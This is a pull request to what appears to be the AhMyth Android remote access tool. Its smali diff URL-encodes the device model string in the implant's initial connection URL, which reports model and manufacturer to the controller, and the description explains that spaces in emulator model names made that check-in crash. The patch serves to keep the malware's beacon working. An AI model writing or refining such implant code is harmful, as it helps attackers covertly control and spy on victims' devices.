### PR TITLE
Escape the model number

### DIFF
--- a/app/app/Factory/Ahmyth/smali/ahmyth/mine/king/ahmyth/IOSocket.smali
+++ b/app/app/Factory/Ahmyth/smali/ahmyth/mine/king/ahmyth/IOSocket.smali
@@ -86,9 +86,9 @@
 
     invoke-static {v4}, Landroid/net/Uri;->encode(Ljava/lang/String;)Ljava/lang/String;
 
-    move-result-object v5
+    move-result-object v4
 
-    invoke-virtual {v3, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
+    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
 
     move-result-object v3
 

--- a/app/app/Factory/Ahmyth/smali/ahmyth/mine/king/ahmyth/IOSocket.smali
+++ b/app/app/Factory/Ahmyth/smali/ahmyth/mine/king/ahmyth/IOSocket.smali
@@ -84,7 +84,11 @@
 
     sget-object v4, Landroid/os/Build;->MODEL:Ljava/lang/String;
 
-    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
+    invoke-static {v4}, Landroid/net/Uri;->encode(Ljava/lang/String;)Ljava/lang/String;
+
+    move-result-object v5
+
+    invoke-virtual {v3, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
 
     move-result-object v3
 


### PR DESCRIPTION
The model number of an android device can contain a string, and not only numbers

For example, the value of it is ```Android SDK built for x86``` inside an AVD Emulator :

![screenshot_20170802_150453](https://user-images.githubusercontent.com/9406403/28874932-f4edbb22-777a-11e7-9242-af42bc65455c.png)

The spaces in the string cause the app to crash, because the model number is used during the first connection. Java say the URL ```.http://[...]?model=Android SDK built for x86&manf=[....]``` is invalid, and the request fail.

URL escaping the Model Number (eg : ```spaces -> %20```, etc.. ) make the URL become correct again. 

So I passed the model version variable to android.net.Uri.encode(), to solve the problem